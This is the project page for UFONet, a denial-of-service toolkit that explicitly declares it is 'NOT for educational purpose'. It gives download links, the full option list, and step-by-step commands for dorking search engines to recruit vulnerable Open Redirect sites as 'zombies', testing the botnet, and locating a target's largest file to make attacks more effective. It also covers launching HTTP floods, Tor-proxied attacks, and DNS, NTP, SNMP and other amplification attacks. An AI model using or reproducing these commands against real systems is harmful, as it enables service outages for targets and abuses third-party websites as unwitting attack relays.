UFONet - Denial of Service Toolkit 

"oderint dum metuant"


  • [03/2022] - UFONet code (v1.8 aka [DPh] "DarK-PhAnT0m!") has been released...


Up to menu
UFONet is a free software, P2P and cryptographic -disruptive toolkit- that allows to perform DoS and DDoS attacks; on the Layer 7 (APP/HTTP) through the exploitation of Open Redirect vectors on third-party websites to act as a botnet and on the Layer3 (Network) abusing the protocol. It also works as an encrypted DarkNET to publish and receive content by creating a global client/server network.
+ [01/2018] - UFONet (v1.2 "HackRon") slides: (.pdf)
+ [12/2016] - UFONet (v0.8 "Ninja DDoS Nation") slides: (.pdf)

[!]Remember: this tool is NOT for educational purpose.

UFONet Blazar!
Usage of UFONet for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.


Up to menu
+ Source code (official):

git clone http://code.03c8.net:3000/epsylon/ufonet

-------------------------------- + Source code (mirror):

git clone https://github.com/epsylon/ufonet

-------------------------------- + Packages (latest version) (Python3): - UFONet-v1.8 (.zip) (md5:c8ab016f6370c8391e2e6f9a7cbe990a) - torrent - UFONet-v1.8 (.tar.gz) (md5:8a4cd86c21db2ad657eb75e6ac0e52d5) - torrent -------------------------------- + Packages (previous versions) (Python3): - UFONet-v1.7 (.zip) (md5:05e3db3a7a79d286eaaf628a44e5c6dd) - torrent - UFONet-v1.7 (.tar.gz) (md5:e0c779fbf429085d555102ea90c5813f) - torrent - UFONet-v1.6 (.zip) (md5:7ad93fc7021ad261dd828806fea86151) - torrent - UFONet-v1.6 (.tar.gz) (md5:49e9e16fbc97e3a2ca94cbab3ae02631) - torrent - UFONet-v1.5 (.zip) (md5:d0e9c3d2d55d7f30dee94e248a688ff8) - torrent - UFONet-v1.5 (.tar.gz) (md5:3064bb0d8ecc8e38d8cefedeb10bf9d4) - torrent - UFONet-v1.4.1 (.zip) (md5:7c9b151b6456284b0b9be5d0c54bbfe0) - torrent - UFONet-v1.4.1 (.tar.gz) (md5:8093df331b89f9b800772d8202fa59d6) - torrent - UFONet-v1.4 (.zip) (md5:3c6451f885e8e6e2693940ee5d3448c1) - torrent - UFONet-v1.4 (.tar.gz) (md5:e31177e7f9c739a115f003ef4f391543) - torrent -------------------------------- + Packages (old versions) (Python2): - UFONet-v1.2 (.zip) (md5:c9c0f17172f031254d24b2490ac6fdd8) - torrent - UFONet-v1.2 (.tar.gz) (md5:c1ec221727b9cd2ac06a67b4c61830d0) - torrent - UFONet-v1.1 (.zip) (md5:04a0b3439384a0d51cce72ba4a2cae82) - torrent - UFONet-v1.1 (.tar.gz) (md5:a0c7cf82ee1eb74370c3faec727b661c) - torrent - UFONet-v1.0 (.zip) (md5:a928524c167238d6a95a8a38ada5c334) - torrent - UFONet-v1.0 (.tar.gz) (md5:5b4d8d6740f22329bfe4a44f07a7f7a9) - torrent - UFONet-v1.0-1.all (.deb) (md5:fd0b125f8374fd731290657fa7e3f1b7) - UFONet-v0.9 (.zip) (md5:7540f45eb8e2d3881f8d17e9a638987a) - torrent - UFONet-v0.9 (.tar.gz) (md5:2885a332afecea3d730361557a84a9ca) - torrent - UFONet-v0.8 (.zip) (md5:da3f21a040ff5089f86f9d6f83c65138) - torrent - UFONet-v0.8 (.tar.gz) (md5:43c282660fde63a0c287e2c3a3260f76) - torrent - UFONet-v0.7 (.zip) (md5:77af04023893d71f34e12a424247a0dd) - torrent - UFONet-v0.7 (.tar.gz) (md5:5f4656a8e0a75a8483c3d425e86cca4b) - torrent - UFONet-v0.6 (.zip) (md5:f6be802f76e40b7dfd06075bfc616e39) - torrent - UFONet-v0.6 (.tar.gz) (md5:40ca8242475a72dc99c139309fe9055c) - torrent - UFONet-v0.5b (.tar.gz) (md5:775f13baefb9241142c377f8519506f7)


Up to menu
If you have problems with UFONet, try to solve them following next links: - Website FAQ section - UFONet GitHub issues
Also you can stay in touch by reporting on my "mothership" (Board provided by default) [ +Zoom ].
If nobody gets back to you, then drop me an e-mail.


Up to menu
UFONet runs on many platforms. It requires Python (>=3) and the following libraries: python3-pycurl - Python bindings to libcurl (Python 3) python3-geoip - Python3 bindings for the GeoIP IP-to-country resolver library libgeoip-dev - Development files for the GeoIP library libgeoip1 - non-DNS IP-to-country resolver library python3-whois - Python module for retrieving WHOIS information - Python 3 python3-crypto - cryptographic algorithms and protocols for Python 3 python3-requests - elegant and simple HTTP library for Python3, built for human beings python3-scapy - Packet crafting/sniffing/manipulation/visualization security tool You can automatically get all required libraries using (as root): python3 setup.py install For manual installation on Debian-based systems (ex: Ubuntu), run: sudo apt-get install python3-pycurl python3-geoip python3-whois libgeoip1 libgeoip-dev sudo apt-get install python3-crypto python3-requests python3-scapy On other systems such as: Kali, Ubuntu, ArchLinux, ParrotSec, Fedora, etc... also run: pip3 install GeoIP pip3 install python-geoip pip3 install pygeoip pip3 install requests pip3 install pycrypto pip3 install pycurl pip3 install whois pip3 install scapy-python3 Source libs: * Python: https://www.python.org/downloads/ * PyCurl: http://pycurl.sourceforge.net/ * GeoIP: https://pypi.python.org/pypi/GeoIP/ * Python-geoip: https://pypi.org/project/python-geoip/ * Pygeoip: https://pypi.org/project/pygeoip/ * Whois: https://pypi.python.org/pypi/whois * PyCrypto: https://pypi.python.org/pypi/pycrypto * PyRequests: https://pypi.python.org/pypi/requests * Scapy-Python3: https://pypi.org/project/scapy-python3/ * Leaflet: http://leafletjs.com/ (provided)


Up to menu
./ufonet [options] {(D)enial(OFF)ensive(S)ervice[ToolKit]}-{by_(io=psy+/03c8.net)} Options: --version show program's version number and exit -h, --help show this help message and exit -v, --verbose active verbose on requests --examples print some examples --timeline show program's code timeline --update check for latest stable version --check-tor check to see if Tor is used properly --force-ssl force usage of SSL/HTTPS requests --force-yes set 'YES' to all questions --gui start GUI (UFONet Web Interface) *Tools*: --crypter Crypt/Decrypt messages using AES256+HMAC-SHA1 --network Show info about your network (MAC, IPs) --xray=XRAY Fast port scanner (ex: --xray 'http(s)://target.com') --xray-ps=XRAYPS Set range of ports to scan (ex: --xray-ps '1-1024') *Configure Request(s)*: --proxy=PROXY Use proxy server (ex: --proxy '') --user-agent=AGENT Use another HTTP User-Agent header (default: SPOOFED) --referer=REFERER Use another HTTP Referer header (default: SPOOFED) --host=HOST Use another HTTP Host header (default: NONE) --xforw Set your HTTP X-Forwarded-For with random IP values --xclient Set your HTTP X-Client-IP with random IP values --timeout=TIMEOUT Select your timeout (default: 5) --retries=RETRIES Retries when the connection timeouts (default: 0) --threads=THREADS Max number of concurrent HTTP requests (default: 5) --delay=DELAY Delay between each HTTP request (default: 0) *Search for 'Zombies'*: --auto-search Search automatically for 'zombies' (may take time!) -s SEARCH Search from a 'dork' (ex: -s 'proxy.php?url=') --sd=DORKS Search from 'dorks' file (ex: --sd 'botnet/dorks.txt') --sn=NUM_RESULTS Set max number of results for engine (default: 10) --se=ENGINE Search engine for 'dorking' (default: DuckDuckGo) --sa Search massively using all engines (may take time!) --sax=EX_ENGINE Exclude engines when mass searching (ex: 'Bing,Yahoo') *Test Botnet*: --test-offline Fast check to discard offline bots --test-all Update ALL botnet status (may take time!) -t TEST Update 'zombies' status (ex: -t 'botnet/zombies.txt') --test-rpc Update 'reflectors' status (ex: --test-rpc) --attack-me Order 'zombies' to attack you (NAT required!) *Community*: --deploy Deploy data to share in '/var/www/ufonet/' --grider Create a 'grider' to share 'stats/wargames/messages' --blackhole Generate a 'blackhole' to share 'zombies' --download-nodes Download 'zombies' from Radar --up-to=UPIP Upload 'zombies' to IP (ex: --up-to '') --down-from=DIP Download 'zombies' from IP (ex: --down-from '') --upload-zombies Upload 'zombies' to Community --download-zombies Download 'zombies' from Community --upload-github Upload 'zombies' to GitHub --download-github Download 'zombies' from GitHub *Research Target*: -i INSPECT Search biggest file (ex: -i 'http(s)://target.com') -x ABDUCTION Examine webserver configuration (+CVE, +WAF detection) *Configure Attack(s)*: -a TARGET [DDoS] attack a target (ex: -a 'http(s)://target.com') -f TARGET_LIST [DDoS] attack a list of targets (ex: -f 'targets.txt') -b PLACE Set place to attack (ex: -b '/path/big.jpg') -r ROUNDS Set number of rounds (ex: -r '1000') (default: 1) *Extra Configuration(s)*: --no-droids Disable 'DROIDS' redirectors --no-ucavs Disable 'UCAVS' checkers --no-aliens Disable 'ALIENS' web abuse --no-rpcs Disable 'XML-RPCs' reflectors --no-head Disable 'Is target up?' starting check --no-scan Disable 'Scan shields' round check --no-purge Disable 'Zombies purge' round check --expire=EXPIRE Set expire time for 'Zombies purge' (default: 30) *Extra Attack(s)*: --fraggle=FRAGGLE [DDoS] 'UDP amplification' (ex: --fraggle 101) --tachyon=TACHYON [DDoS] 'DNS amplification' (ex: --tachyon 101) --monlist=MONLIST [DDoS] 'NTP amplification' (ex: --monlist 101) --smurf=SMURF [DDoS] 'ICMP amplification' (ex: --smurf 101) --sniper=SNIPER [DDoS] 'SNMP amplification' (ex: --sniper 101) --spray=SPRAY [DDoS] 'TCP-SYN reflection' (ex: --spray 101) --db=DBSTRESS [DDoS] 'HTTP-DB flood' (ex: --db 'search.php?q=') --loic=LOIC [ DoS] 'HTTP-FAST flood' (ex: --loic 101) --loris=LORIS [ DoS] 'HTTP-SLOW flood' (ex: --loris 101) --ufosyn=UFOSYN [ DoS] 'TCP-SYN flood' (ex: --ufosyn 101) --xmas=XMAS [ DoS] 'TCP-XMAS flood' (ex: --xmas 101) --nuke=NUKE [ DoS] 'TCP-STARVATION flood' (ex: --nuke 101) --ufoack=UFOACK [ DoS] 'TCP-ACK flood' (ex: --ufoack 101) --uforst=UFORST [ DoS] 'TCP-RST flood' (ex: --uforst 101) --droper=DROPER [ DoS] 'IP-FRAGMENTATION flood' (ex: --droper 101) --overlap=OVERLAP [ DoS] 'IP-OVERLAP flood' (ex: --overlap 101) --pinger=PINGER [ DoS] 'ICMP flood' (ex: --pinger 101) --ufoudp=UFOUDP [ DoS] 'UDP flood' (ex: --ufoudp 101)


Up to menu
  • Searching for 'zombies':

UFONet can dig on different search engines results to find possible 'Open Redirect' vulnerable sites. 

A common query string should be like this:


For example, you can begin a search with:

       ./ufonet -s 'proxy.php?url='

Or providing a list of "dorks" from a file:

       ./ufonet --sd 'botnet/dorks.txt'

By default UFONet will use a search engine called 'DuckDuckGo'. But you can choose a different one:

       ./ufonet -s 'proxy.php?url=' --se 'bing'

This is the list of available search engines with last time that they were working:

        - duckduckgo [13/07/2021: OK!]
        - bing       [13/07/2021: OK!]
        - yahoo      [13/07/2021: OK!]

You can also search massively using all search engines supported:

       ./ufonet -s 'proxy.php?url=' --sa 

To control how many 'zombies' recieved from the search engines reports you can use:

       ./ufonet --sd 'botnet/dorks.txt' --sa --sn 20

Or you can make the tool to search for the maximun number of results automatically (this may take time!):

       ./ufonet --auto-search

At the end of the process, you will be asked if you want to check the list retrieved to see 
if the urls are vulnerable.

       Want to check if they are valid zombies? (Y/n)

Also, you will be asked to update the list adding automatically only the 'vulnerable' web apps.

       Want to update your list? (Y/n)

If your answer is 'Y', your new 'zombies' will be appended to the file named: zombies.txt


     + with verbose:       ./ufonet -s 'proxy.php?url=' -v
     + with threads:       ./ufonet --sd 'botnet/dorks.txt' --sa --threads 100

  • Testing botnet:

UFONet can test if your 'zombies' are vulnerable and can be used for attacking tasks. 

For example, open 'botnet/zombies.txt' (or another file) and create a list of possible 'zombies'. 
Remember that urls of the 'zombies' should be like this:


After that, launch:

       ./ufonet -t 'botnet/zombies.txt'

You can test for XML-RPC Pingback vulnerability related 'zombies', with:

       ./ufonet --test-rpc

To check if your 'zombies' are still infected testing the whole botnet (this may take time!) try this:

       ./ufonet --test-all

And to check if your 'zombies' are still online run:

       ./ufonet --test-offline

Finally, you can order your 'zombies' to attack you and see how they reply to your needs using:

       ./ufonet --attack-me 

At the end of the process, you will be asked if you want to check the list retrieved to see 
if the urls are vulnerable.

       Want to check if they are valid zombies? (Y/n)

If your answer is 'Y', the file: "botnet/zombies.txt" will be updated.


     + with verbose:        ./ufonet -t 'botnet/zombies.txt' -v
     + with proxy TOR:      ./ufonet -t 'botnet/zombies.txt' --proxy=""
     + with threads:        ./ufonet -t 'botnet/zombies.txt' --threads 50

     + test whole botnet:   ./ufonet --test-all
     + test XML-RPCs:       ./ufonet --test-rpc
     + search for offlines: ./ufonet --test-offline 
     + attack yourself:     ./ufonet --attack-me

  • Inspecting a target:

UFONet can search for biggest file on your target by crawlering it:

       ./ufonet -i http://target.com

You can use this before to attack to be more effective.

       ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"



       ./ufonet -i http://target.com



        +Image found: images/wizard.jpg
	(Size: 63798 Bytes)
	+Style (.css) found: fonts.css
	(Size: 20448 Bytes)
	+Webpage (.php) found: contact.php
	(Size: 2483 Bytes)
	+Webpage (.php) found: about.php
	(Size: 1945 Bytes)
	+Webpage (.php) found: license.php
	(Size: 1996 Bytes)
	=Biggest File: http://target.com/images/wizard.jpg

  • Abducting a target:

UFONet can provide you some interesting information about your target:

       ./ufonet -x http://target.com



       ./ufonet -x https://yahoo.com



       -Target URL: https://yahoo.com 
       -IP    :
       -IPv6  : OFF
       -Port  : 443
       -Domain: yahoo.com

       -Bytes in : 550.09 KB
       -Load time: 9.10 seconds

       -Banner: ATS
       -Vía   : http/1.1 usproxy3.fp.ne1.yahoo.com (ApacheTrafficServer), 
                http/1.1 media-router-fp25.prod.media.ir2.yahoo.com (ApacheTrafficServer [cMsSf ]) 

       -WAF/IDS: FIREWALL NOT PRESENT (or not discovered yet)! ;-)


        + CVE-2017-7671 -> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7671
        + CVE-2017-5660 -> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5660

        [Info] Abduction finished... ;-)


  • Attacking a target:

UFONet can attack your target in many different ways.

For example, enter a target to attack with a number of rounds:

       ./ufonet -a http://target.com -r 10

On this example UFONet will attack the target a number of 10 times for each 'zombie'. That means that 
if you have a list of 1.000 'zombies' it will launch: 

       1.000 'zombies' x 10 rounds = 10.000 requests

If you don't put any round it will apply only 1 by default.

Additionally, you can choose a place to recharge on target's site. For example, a large image, 
a big size file or a flash movie. In some scenarios where targets doesn't use cache systems 
this will make the attack more effective.

       ./ufonet -a http://target.com -b "/images/big_size_image.jpg"


     + with verbose:     ./ufonet -a http://target.com -r 10 -v
     + with proxy TOR:   ./ufonet -a http://target.com -r 10 --proxy=""
     + with a place:     ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"
     + with threads:     ./ufonet -a http://target.com -r 10 --threads 500

  • Special attacks:

You can use UFONet to stress database on target by requesting random valid strings as search queries:

     ./ufonet -a http://target.com --db "search.php?q="

Also, it exploits (by default) XML-RPC Pingback Vulnerability, generating callback requests and increasing
processing required by target.

You can test your list of 'XML-RPCs zombies' launching:

     ./ufonet --test-rpc

  • Extra attacks:

 - LOIC: https://en.wikipedia.org/wiki/Low_Orbit_Ion_Cannon
 - LORIS: https://en.wikipedia.org/wiki/Slowloris_(software)
 - UFOSYN: https://en.wikipedia.org/wiki/SYN_flood
 - FRAGGLE: https://en.wikipedia.org/wiki/Fraggle_attack
 - UFORST: https://ddos-guard.net/en/terminology/attack_type/rst-or-fin-flood
 - SPRAY: https://en.wikipedia.org/wiki/DRDOS
 - SMURF: https://en.wikipedia.org/wiki/Smurf_attack
 - XMAS: https://en.wikipedia.org/wiki/Christmas_tree_packet
 - DROPER: https://en.wikipedia.org/wiki/IP_fragmentation_attack
 - SNIPER: https://www.imperva.com/learn/application-security/snmp-reflection/
 - TACHYON: https://www.us-cert.gov/ncas/alerts/TA13-088A
 - PINGER: https://www.cloudflare.com/learning/ddos/ping-icmp-flood-ddos-attack/
 - MONLIST: https://www.us-cert.gov/ncas/alerts/TA14-013A
 - UFOACK: https://www.f5.com/services/resources/glossary/push-and-ack-flood
 - OVERLAP: https://cyberhoot.com/cybrary/fragment-overlap-attack/
 - UFOUDP: https://en.wikipedia.org/wiki/UDP_flood_attack
 - NUKE: https://dl.packetstormsecurity.net/papers/general/tcp-starvation.pdf

All ways could be combined, so UFONet can attack DDoS and DoS, at the same time.

  • Updating:

UFONet implements an option to update the tool to the latest stable version.
This feature can be used only if you have cloned it from a git respository.
To check your version you should launch:

     ./ufonet --update

This will update the tool automatically, removing all files from your old package.

  • Generating 'Blackhole':

  UFONet has some P2P options to share/keep 'zombies' with other 'motherships'.
  * Setup web server (apache, nginx...) with a folder "ufonet", this folder should be: 

    - Located in: /var/www/ufonet
    - Owned by the user running the blackhole
    - Accessible with: http(s)://your-ip/ufonet/

  * Anyone wanting to connect to your server needs to set the --up-to/--down-from 
    to the ip address of your webserver...


   + Starting 'blackhole' server: ./ufonet --blackhole (as daemon: ./ufonet --blackhole &)


Up to menu
You can manage UFONet using a Web interface. The tool has implemented a python web server connected to the core, to provides you a more user friendly experience. To launch it, use: ./ufonet --gui This will open a tab on your default browser with all features of the tool and some 'extra' options:

Read NEWS from other motherships
Read MISSIONS from other motherships
Watch TV/VIDEOS from other motherships
Send/Receive MESSAGES from other motherships
Search for BLACKHOLES from other motherships
Review STATISTICS from other motherships
Research for INFORMATION about a target
Join WARGAMES from other motherships
Watch STREAMS from other motherships
Check LINKS from other motherships
Search for OTHER motherships
Play GAMES from your mothership
Surf INTERNET from your mothership


Up to menu
* [VIDEO]: UFONet v1.4 "Tim3WaRS!" -> [PLAY!]
* [VIDEO]: UFONet v1.3 "SingularitY!"-> [PLAY!]
* [VIDEO]: UFONet v1.2 "Armageddon!"-> [PLAY!] * [VIDEO]: UFONet v1.1 "Quantum Hydra!"-> [PLAY!] * [VIDEO]: UFONet v1.0 "Tachy0n!"-> [PLAY!] * [VIDEO]: UFONet v0.9 "Blazar!"-> [PLAY!] * [VIDEO]: UFONet v0.7 "Big Crunch!"-> [PLAY!] * [VIDEO]: UFONet v0.6 "Galactic OFFensive"-> [PLAY!]
* Shell: Version [ +Zoom ]

UFONet Phantom!
* Shell: Board [ +Zoom ]

UFONet Phantom!
* Shell: GUI [ +Zoom ]

UFONet Phantom!
* GUI: Welcome [ +Zoom ]

UFONet Mverse!
* GUI: Main [ +Zoom ]

UFONet Phantom!
* GUI: Help [ +Zoom ]

UFONet Kraken!
* GUI: Botnet [ +Zoom ]

UFONet Phantom!
* GUI: Stats [ +Zoom ]

UFONet Kraken!
* GUI: Ranking [ +Zoom ]

UFONet Multiverse!
* GUI: Board [ +Zoom ]

UFONet Quantum Hydra!
* GUI: Grid Board [ +Zoom ]

UFONet Singularity!
* GUI: Grid Stats [ +Zoom ]

UFONet Singularity!
* GUI: Wargames [ +Zoom ]

UFONet Singularity!
* GUI: Streams [ +Zoom ]

UFONet Multiverse!
* GUI: Attack [ +Zoom ]

UFONet Kraken!
* GUI: GlobalMap Deploying Botnet [ +Zoom ]

UFONet Big Crunch!
* GUI: GlobalMap Botnet Attack [ +Zoom ]

UFONet Big Crunch!


Up to menu
UFONet is released under the terms of the GPLv3 and is copyrighted by psy.


Up to menu
Date Size Version Alias -------------------------------------------------- 2013-06-18 7.6kB 0.1_pre_a - 2013-06-22 8.3kB 0.2a - 2014-09-17 12.6kB 0.3_pre_b - 2014-09-27 12.8kB 0.3.1b Abduction 2014-12-16 36.3kB 0.4b Infection! 2015-05-24 59.0kB 0.5b Invasion! 2016-02-20 287.5kB 0.6 Galactic Offensive! 2016-08-18 301.9kB 0.7 Big Crunch! 2016-12-12 450.8kB 0.8 U-NATi0n! 2017-07-13 872.5kB 0.9 Blazar! 2018-03-07 947.9kB 1.0 TachYon! 2018-09-26 950.7kB 1.1 Quantum Hydra! 2018-12-31 966.9Kb 1.2 Armageddon! 2019-03-07 1.0Mb 1.3 Singularity! 2020-02-01 25.0Mb 1.4 Tim3WaRS! 2020-06-08 27.2Mb 1.5 MuLTi.V3rSe! 2020-08-17 27.4Mb 1.6 M4RAuD3R! 2021-07-14 27.0Mb 1.7 /KRäK!eN/ 2022-03-02 25.8Mb 1.8 DarK-PhAnT0m!


Up to menu
To make donations use the following hashes: - Bitcoin (BTC): 19aXfJtoYJUoXEZtjNwsah2JKN9CK5Pcjw - Ecoin (ECO): ETsRCBzaMawx3isvb5svX7tAukLdUFHKze